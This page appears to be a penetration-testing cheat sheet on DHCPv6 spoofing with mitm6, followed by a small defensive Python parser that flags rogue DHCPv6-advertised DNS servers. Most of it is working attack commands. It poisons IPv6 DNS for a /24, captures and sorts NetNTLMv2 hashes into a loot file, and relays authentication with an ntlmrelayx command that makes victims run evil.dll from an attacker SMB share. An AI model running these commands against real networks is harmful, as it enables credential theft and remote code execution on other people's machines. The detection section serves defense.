DHCPv6 Spoofing
Dynamic Host Configuration Protocol version 6
mitm6
Install:
$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install
or, via pipx:
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"
Generate a list of targets for NTLM relay and prepare a C2 listener and stager:
$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt
Start SMB server to capture NTLM hashes and serve the stager:
$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out
Get ready to relay authentication and try executing a command:
$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server
Start MitMing:
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn
Parse, sort and save NTLM hashes:
# Users
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6
$ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6
# Machines
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1
Attack vectors
Grab hashes with smbserver.py (passive):
1. mitm6.py poisons the IPv6 DNS settings of all hosts in the /24 network. Victims start to use the attacker's machine as their primary DNS server.
2. mitm6.py on the attacker's machine acts as a rogue DNS server and answers all incoming queries with the attacker's IP.
3. smbserver.py collects hashes from the victims' SMB requests.
Relay authentication with ntlmrelayx.py (active):
1. mitm6.py poisons the IPv6 DNS settings of all hosts in the /24 network. Victims start to use the attacker's machine as their primary DNS server.
2. mitm6.py on the attacker's machine acts as a rogue DNS server; ntlmrelayx.py serves a malicious WPAD file pointing at a non-existent hostname (which resolves to the attacker's IP anyway) and acts as a rogue proxy server, while mitm6.py answers all incoming DNS queries with the attacker's IP.
3. Victims fetch the WPAD file and ask the rogue IPv6 DNS server (the attacker's machine) to resolve the proxy's location, which resolves to the attacker's machine.
4. Victims connect to the rogue proxy server, where ntlmrelayx.py responds with HTTP 407 Proxy Authentication Required.
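Since the whole chain starts with a DHCPv6 ADVERTISE/REPLY that hands out the attacker's address as the DNS server, a network sensor can flag the attack at step 1 by checking the DNS Recursive Name Server option (code 23) of every DHCPv6 server message against an allowlist. The parser below is an added example written for this page, not code from mitm6 or Impacket; the sample packet, the rogue link-local address and the allowlisted resolver 2001:db8::53 are constructed values.

```python
import struct
import ipaddress

# DHCPv6 message types and option codes (RFC 8415 / RFC 3646)
MSG_ADVERTISE, MSG_REPLY = 2, 7
OPT_DNS_SERVERS = 23  # DNS Recursive Name Server option: list of 16-byte IPv6 addresses


def parse_dhcpv6(payload: bytes) -> dict:
    """Parse msg-type, transaction-id and the top-level options of a DHCPv6 message."""
    if len(payload) < 4:
        raise ValueError("truncated DHCPv6 header")
    msg_type = payload[0]
    xid = int.from_bytes(payload[1:4], "big")
    options, off = {}, 4
    while off + 4 <= len(payload):
        code, length = struct.unpack("!HH", payload[off:off + 4])
        data = payload[off + 4:off + 4 + length]
        if len(data) != length:
            raise ValueError("truncated option %d" % code)
        options.setdefault(code, []).append(data)
        off += 4 + length
    return {"type": msg_type, "xid": xid, "options": options}


def rogue_dns_servers(payload: bytes, allowed: list) -> list:
    """Return DNS servers advertised by a DHCPv6 server that are not on the allowlist."""
    msg = parse_dhcpv6(payload)
    if msg["type"] not in (MSG_ADVERTISE, MSG_REPLY):
        return []  # only server-originated messages carry option 23
    allowed_set = {ipaddress.IPv6Address(a) for a in allowed}
    rogue = []
    for data in msg["options"].get(OPT_DNS_SERVERS, []):
        for i in range(0, len(data) - 15, 16):
            addr = ipaddress.IPv6Address(data[i:i + 16])
            if addr not in allowed_set:
                rogue.append(str(addr))
    return rogue


def build_advertise(xid: int, dns_servers: list) -> bytes:
    """Construct a minimal DHCPv6 ADVERTISE carrying option 23 (test fixture only)."""
    addrs = b"".join(ipaddress.IPv6Address(a).packed for a in dns_servers)
    opt = struct.pack("!HH", OPT_DNS_SERVERS, len(addrs)) + addrs
    return bytes([MSG_ADVERTISE]) + xid.to_bytes(3, "big") + opt


# Constructed sample: an ADVERTISE naming a link-local address as the DNS server,
# which is what a rogue DHCPv6 server on the local segment looks like on the wire.
SAMPLE = build_advertise(0x123456, ["fe80::1234:5678:9abc:def0"])
ALLOWED_RESOLVERS = ["2001:db8::53"]  # constructed allowlist of the site's real resolvers
```

Feeding this the UDP payload of each DHCPv6 server message seen on port 546 (e.g. from a pcap) produces an alert list; an empty list means every advertised resolver was approved.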